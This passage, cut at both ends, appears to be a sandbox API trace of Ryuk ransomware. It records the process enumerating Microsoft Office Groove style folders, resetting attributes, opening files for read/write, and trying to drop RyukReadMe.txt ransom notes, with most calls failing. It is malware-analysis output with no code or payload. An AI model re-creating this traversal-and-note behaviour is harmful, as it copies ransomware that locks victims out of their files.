lpFindFileData=0x29aabd0) returned 1 [0137.237] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate.css", dwFileAttributes=0x80) returned 0 [0137.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.237] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.237] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.237] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.237] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SlateBlue.css", dwFileAttributes=0x80) returned 0 [0137.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SlateBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slateblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.238] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.238] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.238] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.238] SetLastError (dwErrCode=0x0) [0137.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.238] GetLastError () returned 0x5 [0137.238] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.238] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.238] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.238] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.238] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.238] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.238] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\background.gif", dwFileAttributes=0x80) returned 0 [0137.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.239] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.239] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.239] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.239] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.239] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.239] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.239] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.239] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.240] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.240] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.240] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.240] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.240] SetLastError (dwErrCode=0x0) [0137.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.240] GetLastError () returned 0x5 [0137.240] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.240] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.240] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.240] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue.css", dwFileAttributes=0x80) returned 0 [0137.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.241] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.241] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.241] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.241] SetLastError (dwErrCode=0x0) [0137.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.241] GetLastError () returned 0x5 [0137.241] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.241] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.241] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.242] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.242] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.242] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\BUTTON.GIF", dwFileAttributes=0x80) returned 0 [0137.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\BUTTON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\button.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.242] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.242] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.242] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.242] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.243] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.243] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.243] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.243] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.243] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.243] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.243] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.243] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.243] SetLastError (dwErrCode=0x0) [0137.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.244] GetLastError () returned 0x5 [0137.244] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.244] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.244] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.244] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.244] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen.css", dwFileAttributes=0x80) returned 0 [0137.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.244] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.244] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.244] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.244] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.244] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts.css", dwFileAttributes=0x80) returned 0 [0137.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.245] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.245] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.245] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.245] SetLastError (dwErrCode=0x0) [0137.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.245] GetLastError () returned 0x5 [0137.245] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.246] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.246] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.246] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.246] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.246] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\background.gif", dwFileAttributes=0x80) returned 0 [0137.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.246] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.246] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.246] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.246] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.247] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.247] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.247] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.247] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.247] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.247] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.247] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.247] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.248] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.248] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.248] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.248] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.248] SetLastError (dwErrCode=0x0) [0137.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.248] GetLastError () returned 0x5 [0137.248] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.248] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.248] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.248] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.249] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts2.css", dwFileAttributes=0x80) returned 0 [0137.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts2.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.249] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.249] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.249] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.249] SetLastError (dwErrCode=0x0) [0137.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.249] GetLastError () returned 0x5 [0137.249] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.249] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.249] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.250] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.250] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.250] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.250] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\background.gif", dwFileAttributes=0x80) returned 0 [0137.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.250] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.250] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.250] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.250] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.251] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\HEADER.GIF" (normalized: "c:\\program files\\microsoft 